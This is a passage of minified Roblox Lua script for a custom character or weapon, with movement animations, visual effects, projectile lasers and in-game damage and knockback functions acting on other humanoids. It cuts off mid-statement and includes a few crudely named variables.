s.Pitch=.7;s.Volume=.5;Character.BumperCar:WaitForChild("Part14").Attachment69.Position=Vector3.new(0,-0.1,0.5)dR=0.8;RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(0),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-1-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)RH.C0=clerp(RH.C0,cn(1,-1,0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1,-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end elseif id>1 and hit~=nil then N="Walk"inair=false;if dS==false and Runkey==true then s.Pitch=1;s.Volume=.9;Character.BumperCar:WaitForChild("Part14").Attachment69.Position=Vector3.new(0,-0.2,1.75)dR=1;Humanoid.WalkSpeed=30;Humanoid.JumpPower=55;RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,broski)*angles(math.rad(cum),math.rad(bruhmomento)+RootPart.RotVelocity.Y/40,math.rad(2*math.cos(dQ/1))),.4)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(35-1*math.cos(dQ/4)),math.rad(0),math.rad(-0)+RootPart.RotVelocity.Y/20),.2)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(25-1*math.cos(dQ/4)),math.rad(0),math.rad(-45)),0.2)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(25+1*math.cos(dQ/4)),math.rad(0),math.rad(45)),0.2)RH.C0=clerp(RH.C0,cn(1,-1,0)*il*angles(math.rad(-6),math.rad(0),math.rad(cockand+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1,-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(balltorture+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-0.4,1)*angles(math.rad(-45),math.rad(-180),math.rad(0)),0.4)end;if dS==false and Runkey==false then s.Pitch=.8;s.Volume=.6;Character.BumperCar:WaitForChild("Part14").Attachment69.Position=Vector3.new(0,-0.1,0.5)dR=0.65;Humanoid.WalkSpeed=13;Humanoid.JumpPower=50;RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,0,-1.1)*angles(math.rad(0),math.rad(0),math.rad(.5*math.cos(dQ/1))),.3)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-1-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)+RootPart.RotVelocity.Y/20),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)RH.C0=clerp(RH.C0,cn(1,-1,0)*il*angles(math.rad(-6),math.rad(0),math.rad(80+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1,-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-80+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end;function onClimbing(speed)if dS==false then dS=true;Climbanim=true;Humanoid.WalkSpeed=14;while Climbanim==true do for T=0,0,0.1 do swait()dR=0.5;if RootPart.Velocity.y>.01 then s.Pitch=.9;s.Volume=.5;RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,1,-1.1)*angles(math.rad(-90),math.rad(0),math.rad(0)),.3)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-1-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)RH.C0=clerp(RH.C0,cn(1,-1-0.1*math.cos(dQ/8),0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1-0.1*math.cos(dQ/8),-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end;if RootPart.Velocity.y<.5 and RootPart.Velocity.y>-0.5 then s.Pitch=.7;s.Volume=.5;RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,1,-1.1)*angles(math.rad(-90),math.rad(0),math.rad(0)),.1)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-1-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)RH.C0=clerp(RH.C0,cn(1,-1-0.1*math.cos(dQ/8),0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1-0.1*math.cos(dQ/8),-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end;if RootPart.Velocity.y<-1 then s.Pitch=.9;s.Volume=.5;RootJoint.C0=clerp(RootJoint.C0,RootCF*cn(0.05,1,-1.1)*angles(math.rad(-90),math.rad(0),math.rad(180)),.3)Torso.Neck.C0=clerp(Torso.Neck.C0,NeckCF*angles(math.rad(-1-1*math.cos(dQ/8)),math.rad(0),math.rad(-0)),.1)RW.C0=clerp(RW.C0,CFrame.new(1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)LW.C0=clerp(LW.C0,CFrame.new(-1.5,0.5-0.01*math.cos(dQ/8),-.0)*angles(math.rad(45-1*math.cos(dQ/8)),math.rad(0),math.rad(0)),0.1)RH.C0=clerp(RH.C0,cn(1,-1-0.1*math.cos(dQ/8),0)*il*angles(math.rad(-6),math.rad(0),math.rad(90+.05*math.cos(dQ/25))),.1)LH.C0=clerp(LH.C0,cn(-1,-1-0.1*math.cos(dQ/8),-.0)*im*angles(math.rad(6),math.rad(-0),math.rad(-90+.05*math.cos(dQ/25))),.1)SWW.C0=clerp(SWW.C0,CFrame.new(0,-1.5,-.8)*angles(math.rad(-0),math.rad(-180),math.rad(0)),0.1)end end;if id>1 then Climbanim=false end end;dS=false end end;Humanoid.Climbing:connect(onClimbing)end end;if#Effects>0 then for c5=1,#Effects do if Effects[c5]~=nil then local jw=Effects[c5]if jw~=nil then local Part=jw[1]local fj=jw[2]local Delay=jw[3]local jx=jw[4]local jy=jw[5]local jz=jw[6]if jw[1].Transparency<=1 then if jw[2]=="Block1"then jw[1].CFrame=jw[1].CFrame*CFrame.fromEulerAnglesXYZ(math.random(-50,50),math.random(-50,50),math.random(-50,50))local Mesh=jw[1].Mesh;Mesh.Scale=Mesh.Scale+Vector3.new(jw[4],jw[5],jw[6])jw[1].Transparency=jw[1].Transparency+jw[3]elseif jw[2]=="Block2"then jw[1].CFrame=jw[1].CFrame+Vector3.new(0,-.0,0)local Mesh=jw[7]Mesh.Scale=Mesh.Scale+Vector3.new(jw[4],jw[5],jw[6])jw[1].Transparency=jw[1].Transparency+jw[3]elseif jw[2]=="Block3"then jw[1].CFrame=jw[1].CFrame*CFrame.fromEulerAnglesXYZ(math.random(-50,50),math.random(-50,50),math.random(-50,50))+Vector3.new(0,.15,0)local Mesh=jw[7]Mesh.Scale=Mesh.Scale+Vector3.new(jw[4],jw[5],jw[6])jw[1].Transparency=jw[1].Transparency+jw[3]elseif jw[2]=="Cylinder"then local Mesh=jw[1].Mesh;Mesh.Scale=Mesh.Scale+Vector3.new(jw[4],jw[5],jw[6])jw[1].Transparency=jw[1].Transparency+jw[3]elseif jw[2]=="Blood"then local Mesh=jw[7]jw[1].CFrame=jw[1].CFrame*Vector3.new(0,.5,0)Mesh.Scale=Mesh.Scale+Vector3.new(jw[4],jw[5],jw[6])jw[1].Transparency=jw[1].Transparency+jw[3]elseif jw[2]=="Elec"then local Mesh=jw[1].Mesh;Mesh.Scale=Mesh.Scale+Vector3.new(jw[7],jw[8],jw[9])jw[1].Transparency=jw[1].Transparency+jw[3]elseif jw[2]=="Disappear"then jw[1].Transparency=jw[1].Transparency+jw[3]elseif jw[2]=="Shatter"then jw[1].Transparency=jw[1].Transparency+jw[3]jw[4]=jw[4]*CFrame.new(0,jw[7],0)jw[1].CFrame=jw[4]*CFrame.fromEulerAnglesXYZ(jw[6],0,0)jw[6]=jw[6]+jw[5]end else Part.Parent=nil;table.remove(Effects,c5)end end end end end end)Effects={Block={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay,gf)local jv=CFuncs.Part.Create(EffectModel,"SmoothPlastic",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("BlockMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)if gf==1 or gf==nil then table.insert(Effects,{jv,"Block1",delay,js,jt,ju,msh})else if gf==2 then table.insert(Effects,{jv,"Block2",delay,js,jt,ju,msh})else table.insert(Effects,{jv,"Block3",delay,js,jt,ju,msh})end end end},Sphere={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"Sphere","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Cylinder={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"SmoothPlastic",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("CylinderMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Wave={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"FileMesh","rbxassetid://431164262",Vector3.new(0,0,0),Vector3.new(jo/60,jq/60,jr/60))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js/60,jt/60,ju/60,msh})end},Ring={Create=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CFuncs.Part.Create(EffectModel,"SmoothPlastic",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"FileMesh","rbxassetid://3270017",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Cylinder",delay,js,jt,ju,msh})end},Break={Create=function(jm,jn,jo,jq,jr)local jv=CFuncs.Part.Create(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new(0.5,0.5,0.5))jv.Anchored=true;jv.CFrame=jn*CFrame.fromEulerAnglesXYZ(math.random(-50,50),math.random(-50,50),math.random(-50,50))local msh=CFuncs.Mesh.Create("SpecialMesh",jv,"Sphere","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))local bA=math.random(10,50)/1000;game:GetService("Debris"):AddItem(jv,10)table.insert(Effects,{jv,"Shatter",bA,jv.CFrame,math.random()-math.random(),0,math.random(50,100)/100})end}}RemoveOutlines=function(ec)ec.TopSurface=10 end;CreatePart=function(ed,ee,ef,eg,eh,ei,k)local Part=Create("Part")({Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee})RemoveOutlines(Part)return Part end;CreateMesh=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end;CreateWeld=function(ed,Part0,aA,eo,ep)local Weld=Create("Weld")({Parent=ed,Part0=Part0,Part1=aA,C0=eo,C1=ep})return Weld end;WSHM={'White',"Pastel light red"}WSH=WSHM[math.random(1,#WSHM)]IcePartFunk=function(jA,jB,jC,eU)IcePart=Instance.new("Part",jA)IcePart.Size=Vector3.new(math.random(jC,eU),math.random(jC,eU),math.random(jC,eU))IcePart.CanCollide=false;IuW=Instance.new("Weld")IuW.Name="GuW"IuW.Part0=jA;IuW.C0=cn(math.random(-jB,jB),math.random(-jB,jB),math.random(-jB,jB))*angles(math.random(-180,180),math.random(-180,180),math.random(-180,180))IuW.C1=cn(0,math.random(-jB/2,jB/2),0)IuW.Part1=IcePart;IuW.Parent=jA;IcePart.Transparency=.85;IcePart.Material="Neon"WSH=WSHM[math.random(1,#WSHM)]IcePart.BrickColor=BrickColor.new(""..WSH)RemoveOutlines(IcePart)game:GetService("Debris"):AddItem(IuW,4)game:GetService("Debris"):AddItem(IcePart,6)end;GroundPartFunk2=function(jD,jA,jE,jB,jC,eU,bA)IcePart2=Instance.new("Part",jA)IcePart2.Size=Vector3.new(math.random(jC,eU),math.random(jC,eU),math.random(jC,eU))IcePart2.CanCollide=false;RemoveOutlines(IcePart2)IcePart2.Anchored=true;game:GetService("Debris"):AddItem(IcePart2,.4)IcePart2.Transparency=.3;IcePart2.Material="Neon"IcePart2.BrickColor=BrickColor.new(""..jE)IcePart2.CFrame=CFrame.new(jD.Position+Vector3.new(math.random(-jB,jB),math.random(-jB,0),math.random(-jB,jB)))*angles(math.rad(math.random(-45,45)),math.rad(math.random(-45,45)),math.rad(math.random(-45,45)))for T=0,bA do if bA>1 then GroundPartFunk2(jD,jA,jE,jB,jC,eU,0)end end end;SpikeMeshId=1033714;local jF=function(ed,ei,Color,k,ee,eg,em)local Part=Instance.new("Part",ed)Part.Name=ei;Part.BrickColor=BrickColor.new(Color)Part.Size=k;Part.Material=ee;Part.Transparency=eg;Part.CanCollide=false;RemoveOutlines(Part)local Mesh=Instance.new("SpecialMesh",Part)Mesh.MeshType="Sphere"Mesh.Scale=em;return Mesh and Part end;CFuncs={Part={Create=function(ed,ee,ef,eg,eh,ei,k)local Part=Create("Part")({Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee})RemoveOutlines(Part)return Part end},Mesh={Create=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end},Mesh={Create=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end},Weld={Create=function(ed,Part0,aA,eo,ep)local Weld=Create("Weld")({Parent=ed,Part0=Part0,Part1=aA,C0=eo,C1=ep})return Weld end},Sound={Create=function(eq,par,er,pit)coroutine.resume(coroutine.create(function()local dA=Create("Sound")({Volume=er,Pitch=pit or 1,SoundId=eq,Parent=par or workspace})wait()dA:play()game:GetService("Debris"):AddItem(dA,6)end))end},ParticleEmitter={Create=function(ed,es,et,eu,k,ev,eg,ew,ex,ey,ez,eA,eB,eC,eD,eE,eF,eG,l,eH)local eI=Create("ParticleEmitter")({Parent=ed,Color=ColorSequence.new(es,et),LightEmission=eu,Size=k,Texture=ev,Transparency=eg,ZOffset=ew,Acceleration=ex,Drag=ey,LockedToPart=ez,VelocityInheritance=eA,EmissionDirection=eB,Enabled=eC,Lifetime=eD,Rate=eE,Rotation=eF,RotSpeed=eG,Speed=l,VelocitySpread=eH})return eI end}}Damagefunc=function(Part,hit,gc,gd,ge,gf,gg,Delay,gh,gi)if hit.Parent==nil then return end;local h=hit.Parent:FindFirstChild("Humanoid")for U,v in pairs(hit.Parent:children())do if v:IsA("Humanoid")then h=v end end;if h~=nil and hit.Parent.Name~=Character.Name and hit.Parent:FindFirstChild("Torso")~=nil then if hit.Parent:findFirstChild("DebounceHit")~=nil and hit.Parent.DebounceHit.Value==true then return end;local c=Create("ObjectValue")({Name="creator",Value=game:service("Players").LocalPlayer,Parent=h})game:GetService("Debris"):AddItem(c,0.5)if gh~=nil and gi~=nil then CreateSound(gh,hit,1,gi)end;local Damage=math.random(gc,gd)local go=false;local gq=hit.Parent:findFirstChild("Block")if gq~=nil and gq.className=="IntValue"and gq.Value>0 then go=true;gq.Value=gq.Value-1;print(gq.Value)end;if go==false then h.Health=h.Health-Damage;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,1.5,Part.BrickColor.Color)else h.Health=h.Health-Damage/2;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,1.5,Part.BrickColor.Color)end;if hit.Parent:FindFirstChild("Torso")~=nil then lasthit=hit.Parent.Torso end;if gf=="Knockdown"then local hum=hit.Parent.Humanoid;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)swait(.2)gr.PlatformStand=false end),hum)local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({velocity=gs*ge,P=50,maxForce=Vector3.new(80000,80000,80000),Parent=hit})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(5000,5000,5000)*50,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,0.1)game:GetService("Debris"):AddItem(gu,0.1)elseif gf=="Normal"then local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=gg.CFrame.lookVector*ge})if ge>0 then gn.Parent=hit.Parent.Torso end;game:GetService("Debris"):AddItem(gn,0.5)elseif gf=="Impale"then local Spike=jF(ik.Workspace,"Ice Spike","Really red",Vector3.new(1,2,1),"Neon",.2,Vector3.new(.5,25,.5))Spike.Anchored=true;Spike.Rotation=Vector3.new(math.random(-45,45),0,math.random(-45,45))Spike.Position=hit.Parent.Torso.Position;ik.Debris:AddItem(Spike,4)CFuncs.Sound.Create("http://www.roblox.com/asset/?id=268249319",Spike,.8,2)hit.Parent.Humanoid.PlatformStand=true;swait(1)hit.Parent.Humanoid.PlatformStand=false elseif gf=="Up"then local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,0.1)local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,.1)elseif gf=="UltSlice"then BlockEffect(BrickColor.new("Really red"),SwHandle.CFrame*cn(0,1.8,0),16,141,.5,0,0,0,0.01,2)BlockEffect(BrickColor.new("Really red"),Head.CFrame,21,21,21,0,0,0,0.01,2)BlockEffect(BrickColor.new("Really red"),Torso.CFrame,41,41,21,0,0,0,0.01,2)BlockEffect(BrickColor.new("Really red"),RightArm.CFrame,21,41,21,0,0,0,0.01,2)BlockEffect(BrickColor.new("Really red"),LeftArm.CFrame,21,41,21,0,0,0,0.01,2)BlockEffect(BrickColor.new("Really red"),RightLeg.CFrame,21,41,21,0,0,0,0.01,2)BlockEffect(BrickColor.new("Really red"),LeftLeg.CFrame,21,41,21,0,0,0,0.01,2)elseif gf=="Slice"then local jG=Create("BodyPosition")({P=900,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Head.Position,Parent=hit.Parent.Torso})game:GetService("Debris"):AddItem(jG,1)if hit.Parent:FindFirstChild("HumanoidRootPart")~=nil then for T=1,10 do Effects.Break.Create(BrickColor.new("Really red"),hit.Parent.HumanoidRootPart.CFrame,10,.5,.5)end end elseif gf=="Snare"then local gy=Create("BodyPosition")({P=900,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=hit.Parent.Torso})game:GetService("Debris"):AddItem(gy,1)elseif gf=="Slowness"then local jH=hit.Parent.Humanoid.WalkSpeed;for T=1,25 do hit.Parent.Humanoid.WalkSpeed=4;IcePartFunk(hit.Parent.Torso,.55,0.1,1)end;wait(4)hit.Parent.Humanoid.WalkSpeed=jH elseif gf=="Firedmg"then for T=1,math.random(1,6)do if hit.Parent:FindFirstChild("Torso")~=nil then BlockEffect(BrickColor.new("Really red"),hit.Parent.Torso.CFrame,20,20,20,1.5,1.5,1.5,0.05,3)BlockEffect(BrickColor.new("Gold"),hit.Parent.Torso.CFrame,20,20,20,2,2,2,0.05,3)BlockEffect(BrickColor.new("Really black"),hit.Parent.Torso.CFrame,0,0,0,2,2,2,0.035,3)wait(.1)end end elseif gf=="Freeze"then local gy=Create("BodyPosition")({P=900,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=hit.Parent.Torso})game:GetService("Debris"):AddItem(gy,4)for T=1,25 do IcePartFunk(hit.Parent.Torso,1,1.5,2)end elseif gf=="Freeze2"then local gz=Create("BodyPosition")({P=50000,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=hit.Parent.Torso})local gA=Create("BodyGyro")({maxTorque=Vector3.new(400000,400000,400000)*math.huge,P=20000,Parent=hit.Parent.Torso,cframe=hit.Parent.Torso.CFrame})hit.Parent.Torso.Anchored=true;coroutine.resume(coroutine.create(function(Part)swait(1.5)Part.Anchored=false end),hit.Parent.Torso)game:GetService("Debris"):AddItem(gz,3)game:GetService("Debris"):AddItem(gA,3)end;local gB=Create("BoolValue")({Name="DebounceHit",Parent=hit.Parent,Value=true})game:GetService("Debris"):AddItem(gB,Delay)c=Instance.new("ObjectValue")c.Name="creator"c.Value=Player;c.Parent=h;game:GetService("Debris"):AddItem(c,0.5)end end;ShowDamage=function(eS,gC,gD,Color)local eE=0.033333333333333;if not eS then local eS=Vector3.new(0,0,0)end;local gC=gC or""local gD=gD or 2;if not Color then local Color=Color3.new(1,0,1)end;local gE=CreatePart(workspace,"SmoothPlastic",0,1,BrickColor.new(Color),"Effect",Vector3.new(0,0,0))gE.Anchored=true;local gF=Create("BillboardGui")({Size=UDim2.new(3,0,3,0),Adornee=gE,Parent=gE})local gG=Create("TextLabel")({BackgroundTransparency=1,Size=UDim2.new(1,0,1,0),Text=gC,TextColor3=Color,TextScaled=true,Font=Enum.Font.ArialBold,Parent=gF})game.Debris:AddItem(gE,gD+0.1)gE.Parent=game:GetService("Workspace")delay(0,function()local gH=gD/eE;for jI=1,gH do wait(eE)local jJ=jI/gH;gE.CFrame=CFrame.new(eS)+Vector3.new(0,jJ,0)gG.TextTransparency=jJ end;if gE and gE.Parent then gE:Destroy()end end)end;MagniDamage=function(Part,gI,gJ,gK,gL,gf)for U,c in pairs(workspace:children())do local hum=c:findFirstChild("Humanoid")if hum~=nil then local head=c:findFirstChild("Head")if head~=nil then local gN=head.Position-Part.Position;local gO=gN.magnitude;if gO<=gI and c.Name~=Player.Name then Damagefunc(head,head,gJ,gK,gL,gf,RootPart,0.1,"http://www.roblox.com/asset/?id=231917784",1.2)end end end end end;MagniKILL=function(Part,gI,gL,gf)for U,c in pairs(workspace:children())do local hum=c:findFirstChild("Humanoid")if hum~=nil then local head=c:findFirstChild("Head")if head~=nil then local gN=head.Position-Part.Position;local gO=gN.magnitude;if gO<=gI and c.Name~=Player.Name then hum.Health=0 end end end end end;EffectModel=Instance.new("Model",Character)EffectModel.Name="Effects"BlockEffect=function(jm,jn,jo,jq,jr,js,jt,ju,delay,gf)local jv=CreatePart(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new())jv.Anchored=true;jv.CFrame=jn;local msh=CreateMesh("BlockMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)if gf==1 or gf==nil then table.insert(Effects,{jv,"Block1",delay,js,jt,ju,msh})else if gf==2 then table.insert(Effects,{jv,"Block2",delay,js,jt,ju,msh})else if gf==3 then table.insert(Effects,{jv,"Block3",delay,js,jt,ju,msh})end end end end;CreateSound=function(eq,par,er,pit)coroutine.resume(coroutine.create(function()local j9=Instance.new("Sound",par or workspace)j9.Volume=er;j9.Pitch=pit or 1;j9.SoundId=eq;swait()j9:play()game:GetService("Debris"):AddItem(j9,6)end))end;Laser=function(jm,jn,jo,jq,jr,js,jt,ju,delay)local jv=CreatePart(EffectModel,"Neon",0,0,jm,"Effect",Vector3.new(0.5,0.5,0.5))jv.Anchored=true;jv.CFrame=jn;jv.Material="Neon"local msh=CreateMesh("CylinderMesh",jv,"","",Vector3.new(0,0,0),Vector3.new(jo,jq,jr))game:GetService("Debris"):AddItem(jv,10)coroutine.resume(coroutine.create(function(Part,Mesh)for T=0,6,delay do swait()Part.Transparency=T;Mesh.Scale=Mesh.Scale+Vector3.new(js,jt,ju)end;Part.Parent=nil end),jv,msh)end;shoottraildd=function(mouse,jK,jL)local jM=Vector3.new(math.random(-jL,jL),math.random(-jL/10,jL/10),math.random(-jL,jL))local jN=mouse+Vector3.new(0,6,0)+RootPart.CFrame.lookVector*-2;local jO=mouse+jM;local jP=CFrame.new((jN+jO)/2,jO)local speed=100;local bA=1;coroutine.resume(coroutine.create(function()repeat swait()local hit,pos=rayCast(jN,jP.lookVector,speed,RootPart.Parent)local gO=(jN-pos).magnitude;Laser(BrickColor.new("Really red"),CFrame.new((jN+pos)/2,pos)*angles(1.57,0,0),0,gO*speed/(speed/2),0,-0,0,-0,10)jN=jN+jP.lookVector*speed;bA=bA-1;jP=jP*angles(math.rad(-1),0,0)if hit~=nil then bA=0;local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)game:GetService("Debris"):AddItem(jQ,2)end;do if bA<=0 then local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)if hit~=nil then GroundPartFunk2(jQ,EffectModel,"Really red",1,.1,2,2)BlockEffect(BrickColor.new("Really red"),jQ.CFrame,70,70,70,-.5,-.5,-.5,0.05)MagniDamage(jQ,6,10,25,0,"Slice")end;game:GetService("Debris"):AddItem(jQ,0)end end until bA<=0 end))end;shoottraildd2=function(mouse,jK,jL)local jM=Vector3.new(math.random(-jL,jL),math.random(-jL,jL),math.random(-jL,jL))local jN=jK.Position;local jO=mouse+jM;local jP=CFrame.new((jN+jO)/2,jO)local speed=1000;local bA=1;coroutine.resume(coroutine.create(function()repeat swait()local hit,pos=rayCast(jN,jP.lookVector,speed,RootPart.Parent)local gO=(jN-pos).magnitude;Laser(BrickColor.new("Gold"),CFrame.new((jN+pos)/2,pos)*angles(1.57,0,0),1,gO*speed/(speed/2),1,-8.175,0,-8.175,0.15)jN=jN+jP.lookVector*speed;bA=bA-1;jP=jP*angles(math.rad(-1),0,0)if hit~=nil then bA=0;local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)game:GetService("Debris"):AddItem(jQ,2)end;do if bA<=0 then local jQ=CreatePart(EffectModel,"Neon",0,1,BrickColor.new("Really black"),"Effect",Vector3.new())jQ.Anchored=true;jQ.CFrame=CFrame.new(pos)if hit~=nil then CreateSound("http://www.roblox.com/asset/?id=514867425",jQ,2,1)BlockEffect(BrickColor.new("Really 